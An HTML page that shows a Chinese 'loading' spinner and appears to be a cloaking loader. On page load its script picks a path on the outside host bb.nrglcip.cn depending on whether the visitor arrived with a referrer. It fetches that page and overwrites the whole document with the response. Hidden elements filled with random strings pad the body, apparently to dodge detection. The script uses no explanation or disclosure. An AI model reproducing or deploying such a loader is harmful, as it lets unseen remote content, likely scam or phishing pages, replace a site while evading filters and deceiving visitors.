<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Hq7ABjKeE {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Hq7ABjKeE .prev1J8HVtc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Hq7ABjKeE .content {
            line-height: 50px;
            text-align: center
        }

        .Hq7ABjKeE .img {
            width: 100%
        }

        .Hq7ABjKeE .GMVh3LxR {
            text-align: center
        }

        .Hq7ABjKeE .GMVh3LxR span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Hq7ABjKeE .GMVh3LxR span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Hq7ABjKeE .GMVh3LxR span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Hq7ABjKeE .GMVh3LxR span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Hq7ABjKeE .GMVh3LxR span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Hq7ABjKeE .GMVh3LxR span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Hq7ABjKeE .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function OrAsalOltklRP(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var oFUSW = OrAsalOltklRP('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ oFUSW +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ oFUSW +".html?a=share";
		}
		
        XcPaQUKcv=url+"#"+new Date().getTime();
        XcPaQUKcv && function() {
            $.get(XcPaQUKcv, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>IbHg9BkTACl7MzT8sX4AJ1RgZf0TR00tLJt</div>
<a  href='#' style='display:none'>WaDirXmyFuyqtNDo</a>
<h1 style='display:none' >l0mKYcQmmobuVgLubVCS0DZ86</h1>
<img  src='' style='display:none'><div class="Hq7ABjKeE">
    <div class="prev1J8HVtc">
        <div class="GMVh3LxR">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >krymtBh7Kd3xu40loCRVcHhq1P52W5Sz20oE7nKZjrz96bCvHBtbN</li>
<a  href='#' style='display:none'>WLNuzyJmD29FPRZhiQJm90esWQK6CV54k1jrICVLBsrdFqrFMEzzLwRJL0WQ0wJ4TcudgIazZ2ZHpJiyfhFwmNA</a>
<p  style='display:none'>R3A9iUp5uDkEMdLHSsh1NHaYE6A8bzdWoBHLLVgcHURyCHB7blJD6cUcC6bbidWGIlVHFCD1gUuRHtUfXpQ4omNfpqO7IUnNiadO</p>
<p  style='display:none'>R3A9iUp5uDkEMdLHSsh1NHaYE6A8bzdWoBHLLVgcHURyCHB7blJD6cUcC6bbidWGIlVHFCD1gUuRHtUfXpQ4omNfpqO7IUnNiadO</p>
<p  style='display:none'>R3A9iUp5uDkEMdLHSsh1NHaYE6A8bzdWoBHLLVgcHURyCHB7blJD6cUcC6bbidWGIlVHFCD1gUuRHtUfXpQ4omNfpqO7IUnNiadO</p>
<b style='display:none' >dfupL09ZMMyfP</b>
<div style='display:none'>Rwx8BgyxkGbPvYdp4EnT2sM0XhtdaWtbqf1kbixEIP791FKtyqGAbroXiM1o</div>
<p  style='display:none'>R3A9iUp5uDkEMdLHSsh1NHaYE6A8bzdWoBHLLVgcHURyCHB7blJD6cUcC6bbidWGIlVHFCD1gUuRHtUfXpQ4omNfpqO7IUnNiadO</p>
<span style='display:none'>oIsUGcePSJuJJkmaKRof6oise</span></body>
</html>